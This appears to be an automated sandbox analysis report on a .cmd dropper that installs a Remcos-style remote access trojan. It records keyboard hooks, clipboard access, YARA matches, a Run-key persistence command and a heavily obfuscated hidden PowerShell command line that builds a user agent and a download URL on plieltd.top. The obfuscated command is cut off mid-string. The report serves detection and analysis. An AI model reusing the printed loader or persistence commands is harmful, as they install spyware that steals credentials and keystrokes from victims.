                Source: msiexec.exe, 0000000D.00000003.2249145713.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2248999845.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2249304549.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2250137842.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2248870650.0000000004990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                Source: bhvF678.tmp.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                Source: bhvF678.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                Source: powershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1787742509.000001208164A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top
                Source: powershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/Underbyggelse.aafP
                Source: powershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/Underbyggelse.aafXR$lX
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://www.digicert.com/CPS0
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvF678.tmp.13.dr String found in binary or memory: https://www.office.com/
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.155.139:443 -> 192.168.2.4:49737 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\msiexec.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041183A OpenClipboard,GetLastError, 13_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 14_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 15_2_004072B5

                E-Banking Fraud

                Source: Yara match File source: 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7104, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_3272.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401806 NtdllDefWindowProc_W, 13_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004018C0 NtdllDefWindowProc_W, 13_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004016FD NtdllDefWindowProc_A, 14_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004017B7 NtdllDefWindowProc_A, 14_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00402CAC NtdllDefWindowProc_A, 15_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00402D66 NtdllDefWindowProc_A, 15_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8ABEA2 2_2_00007FFD9B8ABEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8AB0F6 2_2_00007FFD9B8AB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B97AB4A 2_2_00007FFD9B97AB4A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EAEDF0 4_2_04EAEDF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EAF6C0 4_2_04EAF6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EAEAA8 4_2_04EAEAA8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B040 13_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043610D 13_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00447310 13_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A490 13_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040755A 13_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043C560 13_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B610 13_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044D6C0 13_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004476F0 13_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044B870 13_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044081D 13_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414957 13_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004079EE 13_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407AEB 13_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044AA80 13_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00412AA9 13_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404B74 13_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404B03 13_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044BBD8 13_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404BE5 13_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00404C76 13_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00415CFE 13_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00416D72 13_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446D30 13_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446D8B 13_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406E8F 13_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00405038 14_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0041208C 14_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004050A9 14_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040511A 14_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0043C13A 14_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004051AB 14_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00449300 14_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040D322 14_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044A4F0 14_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0043A5AB 14_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00413631 14_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00446690 14_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044A730 14_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004398D8 14_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004498E0 14_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044A886 14_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0043DA09 14_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00438D5E 14_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00449ED0 14_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0041FE83 14_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00430F54 14_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004050C2 15_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004014AB 15_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00405133 15_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004051A4 15_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00401246 15_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040CA46 15_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00405235 15_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004032C8 15_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00401689 15_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00402F60 15_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
                Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6127
                Source: unknown Process created: Commandline size = 6151
                Source: amsi32_3272.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine Classification label: mal100.troj.spyw.evad.winCMD@22/14@8/3
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 13_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 15_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 13_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 13_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 13_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Rafting.Ans
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vd4vqodm.w5c.ps1
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\biljl.vbs"
                Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6852
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3272
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000D.00000003.2248577677.00000000049AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2250287489.00000000049B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: rIMG465244247443GULFORDEROpmagasinering.cmd Virustotal: Detection: 23%
                Source: rIMG465244247443GULFORDEROpmagasinering.cmd ReversingLabs: Detection: 18%
                Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-32919
                Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag 